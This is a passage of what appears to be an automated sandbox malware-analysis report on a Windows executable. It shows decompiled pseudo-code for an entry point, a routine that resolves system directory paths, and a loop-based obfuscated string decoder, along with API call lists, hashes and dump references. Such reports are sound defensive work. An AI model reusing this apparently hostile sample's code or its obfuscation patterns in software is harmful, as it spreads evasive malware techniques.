				_t108 = _a28;
				E00405060( &_v8, _t108);
				if(E00402BC1() == 0 || E0040559A() == 0x41) {
					_t43 = 0;
				} else {
					_t43 = 1;
				}
				if(_t43 == 0) {
					_t45 = E0040DE20();
					_t109 = _t108;
					_push(_t45);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t109);
					GetSystemDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
				} else {
					_t62 = E0040DE20();
					_t114 = _t108;
					_push(_t62);
					E00406260(_t128, 0x800, E0040DE20());
					E0040DE60( &_v8, _t114); // executed
					GetWindowsDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
					_push(_v16);
					_t69 = E0040DE20();
					_pop(_t117);
					E0040DFC0(_t117);
					E0040DFC0(L"sysnative");
					E0040DE60( &_v24, _t69);
					PathAddBackslashW(_v32);
					_push(_v32);
					_t75 = E0040DE20();
					_pop(_t120);
					E0040DFC0(_t120);
					E0040DFC0(_v44);
					E0040DE60( &_v36, _t75);
					_push(_v48);
					_t80 = E0040DE20();
					_pop(_t123);
					E0040DFC0(_t123);
					E0040DFC0(_v60);
					_t125 = _v60;
					E0040DFC0(_t125);
					E0040DE60( &_v52, _t80);
					if(E0040AD60(_t129, 0, _v64) == 0) {
						_a12 = 0;
					} else {
						_a12 = 1;
						E0040A970(0);
					}
					if(E0040AD60(_t129, 0, _a8) == 0) {
						_a16 = 0;
					} else {
						_a16 = 1;
						E0040A970(0);
					}
					if(_a12 + _a16 == 0) {
						_t90 = E0040DE20();
						_t126 = _t125;
						_push(_t90);
						E00406260(_t128, 0x800, E0040DE20());
						E0040DE60( &_v8, _t126);
						GetSystemDirectoryW(_v16, 0x800);
						PathAddBackslashW(_v16);
					}
				}
				_push(_v0);
				_t52 = E0040DE20();
				_pop(_t112);
				E0040DFC0(_t112);
				_t54 = _t52;
				_t55 = E00405170();
				_t113 = _t54;
				_t56 = _t55 + _t113;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t56, _a8), _v12), _v12), _v12), _v12);
			}








































                                                                                                                                                                      0x00403275
                                                                                                                                                                      0x00403275
                                                                                                                                                                      0x00403276
                                                                                                                                                                      0x0040327b
                                                                                                                                                                      0x0040327b
                                                                                                                                                                      0x0040327e
                                                                                                                                                                      0x00403285
                                                                                                                                                                      0x00403285
                                                                                                                                                                      0x00403291
                                                                                                                                                                      0x0040329d
                                                                                                                                                                      0x004032a2
                                                                                                                                                                      0x004032aa
                                                                                                                                                                      0x004032b6
                                                                                                                                                                      0x004032cb
                                                                                                                                                                      0x004032c4
                                                                                                                                                                      0x004032c4
                                                                                                                                                                      0x004032c4
                                                                                                                                                                      0x004032cf
                                                                                                                                                                      0x0040343c
                                                                                                                                                                      0x00403441
                                                                                                                                                                      0x00403442
                                                                                                                                                                      0x00403450
                                                                                                                                                                      0x0040345a
                                                                                                                                                                      0x00403468
                                                                                                                                                                      0x00403471
                                                                                                                                                                      0x004032d5
                                                                                                                                                                      0x004032d6
                                                                                                                                                                      0x004032db
                                                                                                                                                                      0x004032dc
                                                                                                                                                                      0x004032ea
                                                                                                                                                                      0x004032f4
                                                                                                                                                                      0x00403302
                                                                                                                                                                      0x0040330b
                                                                                                                                                                      0x00403314
                                                                                                                                                                      0x00403315
                                                                                                                                                                      0x0040331a
                                                                                                                                                                      0x0040331d
                                                                                                                                                                      0x00403328
                                                                                                                                                                      0x00403332
                                                                                                                                                                      0x0040333b
                                                                                                                                                                      0x00403344
                                                                                                                                                                      0x00403345
                                                                                                                                                                      0x0040334a
                                                                                                                                                                      0x0040334d
                                                                                                                                                                      0x00403357
                                                                                                                                                                      0x00403361
                                                                                                                                                                      0x0040336a
                                                                                                                                                                      0x0040336b
                                                                                                                                                                      0x00403370
                                                                                                                                                                      0x00403373
                                                                                                                                                                      0x0040337d
                                                                                                                                                                      0x00403382
                                                                                                                                                                      0x00403387
                                                                                                                                                                      0x00403391
                                                                                                                                                                      0x004033a6
                                                                                                                                                                      0x004033bc
                                                                                                                                                                      0x004033a8
                                                                                                                                                                      0x004033a8
                                                                                                                                                                      0x004033b5
                                                                                                                                                                      0x004033b5
                                                                                                                                                                      0x004033d4
                                                                                                                                                                      0x004033ea
                                                                                                                                                                      0x004033d6
                                                                                                                                                                      0x004033d6
                                                                                                                                                                      0x004033e3
                                                                                                                                                                      0x004033e3
                                                                                                                                                                      0x004033fc
                                                                                                                                                                      0x004033ff
                                                                                                                                                                      0x00403404
                                                                                                                                                                      0x00403405
                                                                                                                                                                      0x00403413
                                                                                                                                                                      0x0040341d
                                                                                                                                                                      0x0040342b
                                                                                                                                                                      0x00403434
                                                                                                                                                                      0x00403434
                                                                                                                                                                      0x00403439
                                                                                                                                                                      0x0040347a
                                                                                                                                                                      0x0040347b
                                                                                                                                                                      0x00403480
                                                                                                                                                                      0x00403483
                                                                                                                                                                      0x00403488
                                                                                                                                                                      0x0040348a
                                                                                                                                                                      0x0040348f
                                                                                                                                                                      0x00403490
                                                                                                                                                                      0x004034ce

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                                                                                                                      • String ID: sysnative
                                                                                                                                                                      • API String ID: 3406704365-821172135
                                                                                                                                                                      • Opcode ID: f02d473fc1ac19e5e85722fd277aba96ca7fe706b47e575be1252422ce4be597
                                                                                                                                                                      • Instruction ID: 120ea7a7f831b7b3701c46aacaf1f8b25255709322070768e577057f0a501d54
                                                                                                                                                                      • Opcode Fuzzy Hash: f02d473fc1ac19e5e85722fd277aba96ca7fe706b47e575be1252422ce4be597
                                                                                                                                                                      • Instruction Fuzzy Hash: 39512075518701AAD600BBB1CD82F2F66A9EFD0708F10C83FB144791D2CA3CD9595BAE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401000, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                                      			_entry_(void* __ecx, void* __edx, void* __eflags) {
				void _t3;
				void* _t6;
				void* _t13;
				void* _t36;
				intOrPtr _t50;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t63;

				_t63 = __eflags;
				_t54 = __edx;
				_t51 = __ecx;
				memset(0x417008, 0, 0xac);
				 *0x41700c = GetModuleHandleW(0);
				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417008 = _t3;
				E00405000(_t54);
				 *0x41702c = 0x416084; // executed
				_t6 = E0040DDD0(); // executed
				E0040DB41(_t6);
				E00409D61(E0040A2C9(E0040AA40()));
				E00409AE0();
				E00409609(); // executed
				_t13 = E00408D8E(_t51); // executed
				E004053BB(_t13);
				E0040C6E3(_t63);
				E0040B190(_t63);
				E00405068(0x417014, 0x41602a);
				 *0x417034 = GetStdHandle(0xfffffff5);
				_push(0x200);
				_push(0x4170b0);
				E00409D80(4, 0x15, 0);
				E0040A37A( *0x417098);
				E0040A2E8(8, 0x417098, 0x416074, 7);
				E0040A37A( *0x4170a0);
				E0040A2E8(4, 0x4170a0, 0x41606c, 8);
				_push(0x417090);
				_push(0x41607c);
				E0040DB6A(0xc, 0x186a1, 7);
				E00405068(0x417064, 0x416036);
				E0040A37A( *0x4170a8);
				E0040A2E8(4, 0x4170a8, 0x41606c, 8);
				E004098D0(E00401F3B);
				_t36 = E0040DE20();
				_t57 = 0x416036;
				E00402F41(0x417064, _t57, _t63, _t36);
				_push(0x417040);
				E0040DE60();
				E00401B8F(0x417064, _t57, _t63);
				_t50 =  *0x417050; // 0x0
				_t64 = _t50 - 1;
				if(_t50 == 1) {
					E00403001(0x417064, _t57, _t58, _t59, _t64);
				}
				E00403DF3(0x417064, _t58, _t59, _t60);
				_push(0);
				L5();
				E0040DE00();
				HeapDestroy( *0x417008);
				ExitProcess(??);
				E00405379();
				E004098F0();
				E0040A655();
				E0040D264(E0040AA30());
				return E00409AD0();
			}















                                                                                                                                                                      0x00401000
                                                                                                                                                                      0x00401000
                                                                                                                                                                      0x00401000
                                                                                                                                                                      0x0040100f
                                                                                                                                                                      0x00401021
                                                                                                                                                                      0x00401035
                                                                                                                                                                      0x0040103a
                                                                                                                                                                      0x0040103f
                                                                                                                                                                      0x00401049
                                                                                                                                                                      0x0040104e
                                                                                                                                                                      0x00401053
                                                                                                                                                                      0x00401062
                                                                                                                                                                      0x00401067
                                                                                                                                                                      0x0040106c
                                                                                                                                                                      0x00401071
                                                                                                                                                                      0x00401076
                                                                                                                                                                      0x0040107b
                                                                                                                                                                      0x00401080
                                                                                                                                                                      0x00401090
                                                                                                                                                                      0x0040109f
                                                                                                                                                                      0x004010a9
                                                                                                                                                                      0x004010b0
                                                                                                                                                                      0x004010be
                                                                                                                                                                      0x004010c9
                                                                                                                                                                      0x004010e4
                                                                                                                                                                      0x004010ef
                                                                                                                                                                      0x0040110a
                                                                                                                                                                      0x0040110f
                                                                                                                                                                      0x00401114
                                                                                                                                                                      0x00401128
                                                                                                                                                                      0x00401138
                                                                                                                                                                      0x00401143
                                                                                                                                                                      0x0040115e
                                                                                                                                                                      0x0040116a
                                                                                                                                                                      0x00401170
                                                                                                                                                                      0x00401175
                                                                                                                                                                      0x00401177
                                                                                                                                                                      0x0040117c
                                                                                                                                                                      0x00401181
                                                                                                                                                                      0x00401186
                                                                                                                                                                      0x0040118b
                                                                                                                                                                      0x00401191
                                                                                                                                                                      0x00401194
                                                                                                                                                                      0x00401196
                                                                                                                                                                      0x00401196
                                                                                                                                                                      0x0040119b
                                                                                                                                                                      0x004011a0
                                                                                                                                                                      0x004011a5
                                                                                                                                                                      0x004011aa
                                                                                                                                                                      0x004011b5
                                                                                                                                                                      0x004011ba
                                                                                                                                                                      0x004011bf
                                                                                                                                                                      0x004011c4
                                                                                                                                                                      0x004011c9
                                                                                                                                                                      0x004011d3
                                                                                                                                                                      0x004011dd

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040100F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                                        • Part of subcall function 0040DDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
                                                                                                                                                                        • Part of subcall function 0040DDD0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7
                                                                                                                                                                        • Part of subcall function 00409AE0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
                                                                                                                                                                        • Part of subcall function 00409609: InitializeCriticalSection.KERNEL32(004176C8,00000004,00000004,004095DC,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409631
                                                                                                                                                                        • Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
                                                                                                                                                                        • Part of subcall function 00408D8E: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408DB5
                                                                                                                                                                        • Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD
                                                                                                                                                                        • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004176A0,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                                                                                                                                                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                                                                                                                                        • Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
                                                                                                                                                                        • Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
                                                                                                                                                                        • Part of subcall function 00409D80: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22
                                                                                                                                                                        • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A3B8
                                                                                                                                                                        • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3D1
                                                                                                                                                                        • Part of subcall function 0040A37A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A3DB
                                                                                                                                                                        • Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A2FB
                                                                                                                                                                        • Part of subcall function 0040A2E8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00416074,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A310
                                                                                                                                                                        • Part of subcall function 0040DB6A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
                                                                                                                                                                        • Part of subcall function 0040DB6A: memset.MSVCRT ref: 0040DBD5
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00417040,00000000), ref: 00401BCD
                                                                                                                                                                        • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32 ref: 00401BEA
                                                                                                                                                                        • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401BF2
                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011B5
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,00417040,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004011BA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonControlsDestroyEnumExitInitLoadModuleProcessResourceTypes
                                                                                                                                                                      • String ID: *`A$6`A
                                                                                                                                                                      • API String ID: 2062415080-4032199909
                                                                                                                                                                      • Opcode ID: d321d8028d6722669ed11f7fa1be113758f4e77c945287685f05025b2bbb5530
                                                                                                                                                                      • Instruction ID: 054f58a703c2077171097cea621e0c228d2d39f1c558e4fc4fd495567313132e
                                                                                                                                                                      • Opcode Fuzzy Hash: d321d8028d6722669ed11f7fa1be113758f4e77c945287685f05025b2bbb5530
                                                                                                                                                                      • Instruction Fuzzy Hash: 33311C30A84700A9E610B7F29C43FAE3A65AF1874DF11803FB649791E3DEBD55448A6F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403DF3, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                      			E00403DF3(void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, void* _a20, intOrPtr _a28, void* _a44) {
				char _v0;
				signed int _v4;
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v84;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v120;
				char _v128;
				WCHAR* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				WCHAR* _v160;
				void* __ebx;
				void* _t114;
				void* _t119;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t144;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t157;
				void* _t158;
				void* _t164;
				void* _t169;
				void* _t174;
				void* _t178;
				void* _t186;
				void* _t191;
				void* _t195;
				void* _t198;
				void* _t199;
				char* _t218;
				void* _t220;
				void* _t221;
				void* _t225;
				char* _t230;
				void* _t232;
				void* _t233;
				void* _t237;
				char* _t242;
				void* _t244;
				void* _t245;
				void* _t249;
				char* _t254;
				void* _t256;
				void* _t257;
				void* _t261;
				char* _t266;
				void* _t268;
				void* _t269;
				void* _t273;
				char* _t278;
				void* _t280;
				void* _t281;
				void* _t285;
				char* _t290;
				void* _t292;
				void* _t293;
				void* _t297;
				char* _t302;
				void* _t304;
				void* _t305;
				void* _t309;
				char* _t314;
				void* _t316;
				void* _t317;
				void* _t321;
				intOrPtr _t328;
				void* _t347;
				char _t348;
				intOrPtr _t349;
				void* _t350;
				intOrPtr _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t360;
				char _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				intOrPtr _t365;
				void* _t366;
				intOrPtr _t367;
				void* _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t372;
				intOrPtr _t374;
				void* _t377;
				intOrPtr _t379;
				void* _t380;
				void* _t383;
				intOrPtr _t384;
				void* _t385;
				intOrPtr _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t391;
				void* _t392;
				void* _t393;
				intOrPtr _t395;
				void* _t396;
				void* _t397;
				intOrPtr _t399;
				void* _t400;
				void* _t401;
				void* _t404;
				void* _t405;
				void* _t408;
				void* _t409;
				void* _t412;
				void* _t413;
				void* _t416;
				void* _t417;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr* _t424;

				_t423 = __ebp;
				_t422 = __esi;
				_t421 = __edi;
				_t347 = __ecx;
				_t348 = 0xf;
				do {
					_t424 = _t424 - 4;
					_v8 = 0;
					_t348 = _t348 - 1;
				} while (_t348 != 0);
				E0040DF60();
				 *0x41702c = 0x41609a;
				_v8 = 0;
				while(1) {
					_t427 = 0x19 - _v8;
					if(0x19 < _v8) {
						break;
					}
					_t314 =  *0x41702c; // 0x41609a
					_v4 =  *_t314;
					 *0x41702c =  *0x41702c + 1;
					_t316 = E0040DE20();
					_t417 = _t348;
					_push(_t316);
					_push(_t417);
					_t317 = E0040DE20();
					E00405D60(_t427, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t317);
					_push(_v12);
					_t321 = E0040DE20();
					_pop(_t420);
					E0040DFC0(_t420);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v20, _t321);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160fe;
				_v8 = 0;
				while(1) {
					_t429 = 2 - _v8;
					if(2 < _v8) {
						break;
					}
					_t302 =  *0x41702c; // 0x41609a
					_v4 =  *_t302;
					 *0x41702c =  *0x41702c + 1;
					_t304 = E0040DE20();
					_t413 = _t348;
					_push(_t304);
					_push(_t413);
					_t305 = E0040DE20();
					E00405D60(_t429, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t305);
					_push(_v8);
					_t309 = E0040DE20();
					_pop(_t416);
					E0040DFC0(_t416);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v16, _t309);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416103;
				_v8 = 0;
				while(1) {
					_t431 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t290 =  *0x41702c; // 0x41609a
					_v4 =  *_t290;
					 *0x41702c =  *0x41702c + 1;
					_t292 = E0040DE20();
					_t409 = _t348;
					_push(_t292);
					_push(_t409);
					_t293 = E0040DE20();
					E00405D60(_t431, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t293);
					_push(_v4);
					_t297 = E0040DE20();
					_pop(_t412);
					E0040DFC0(_t412);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v12, _t297);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x416101;
				_v8 = 0;
				while(1) {
					_t433 = 1 - _v8;
					if(1 < _v8) {
						break;
					}
					_t278 =  *0x41702c; // 0x41609a
					_v4 =  *_t278;
					 *0x41702c =  *0x41702c + 1;
					_t280 = E0040DE20();
					_t405 = _t348;
					_push(_t280);
					_push(_t405);
					_t281 = E0040DE20();
					E00405D60(_t433, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t281);
					_push(_v0);
					_t285 = E0040DE20();
					_pop(_t408);
					E0040DFC0(_t408);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v8, _t285);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160d7;
				_v8 = 0;
				while(1) {
					_t435 = 0xd - _v8;
					if(0xd < _v8) {
						break;
					}
					_t266 =  *0x41702c; // 0x41609a
					_v4 =  *_t266;
					 *0x41702c =  *0x41702c + 1;
					_t268 = E0040DE20();
					_t401 = _t348;
					_push(_t268);
					_push(_t401);
					_t269 = E0040DE20();
					E00405D60(_t435, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t269);
					_push(_a4);
					_t273 = E0040DE20();
					_pop(_t404);
					E0040DFC0(_t404);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60( &_v4, _t273);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160e5;
				_v8 = 0;
				while(1) {
					_t437 = 0xe - _v8;
					if(0xe < _v8) {
						break;
					}
					_t254 =  *0x41702c; // 0x41609a
					_v4 =  *_t254;
					 *0x41702c =  *0x41702c + 1;
					_t256 = E0040DE20();
					_t397 = _t348;
					_push(_t256);
					_push(_t397);
					_t257 = E0040DE20();
					E00405D60(_t437, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t257);
					_t399 =  *0x417030; // 0x2370568
					_t261 = E0040DE20();
					_t400 = _t399;
					E0040DFC0(_t400);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417030, _t261);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x4160f4;
				_v8 = 0;
				while(1) {
					_t439 = 9 - _v8;
					if(9 < _v8) {
						break;
					}
					_t242 =  *0x41702c; // 0x41609a
					_v4 =  *_t242;
					 *0x41702c =  *0x41702c + 1;
					_t244 = E0040DE20();
					_t393 = _t348;
					_push(_t244);
					_push(_t393);
					_t245 = E0040DE20();
					E00405D60(_t439, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t245);
					_t395 =  *0x417080; // 0x2374ab8
					_t249 = E0040DE20();
					_t396 = _t395;
					E0040DFC0(_t396);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x417080, _t249); // executed
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41608c;
				_v8 = 0;
				while(1) {
					_t441 = 4 - _v8;
					if(4 < _v8) {
						break;
					}
					_t230 =  *0x41702c; // 0x41609a
					_v4 =  *_t230;
					 *0x41702c =  *0x41702c + 1;
					_t232 = E0040DE20();
					_t389 = _t348;
					_push(_t232);
					_push(_t389);
					_t233 = E0040DE20();
					E00405D60(_t441, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t233);
					_t391 =  *0x41705c; // 0x2377ed0
					_t237 = E0040DE20();
					_t392 = _t391;
					E0040DFC0(_t392);
					_t348 = _v20;
					E0040DFC0(_t348);
					E0040DE60(0x41705c, _t237);
					_v40 = _v40 + 1;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				 *0x41702c = 0x41610b;
				_v8 = 0;
				while(1) {
					_t443 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t218 =  *0x41702c; // 0x41609a
					_v4 =  *_t218;
					 *0x41702c =  *0x41702c + 1;
					_t220 = E0040DE20();
					_t385 = _t348;
					_push(_t220);
					_push(_t385);
					_t221 = E0040DE20();
					E00405D60(_t443, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t221);
					_t387 =  *0x417058; // 0x2379f50
					_t225 = E0040DE20();
					_t388 = _t387;
					E0040DFC0(_t388);
					_t348 = _v20;
					E0040DFC0(_t348);
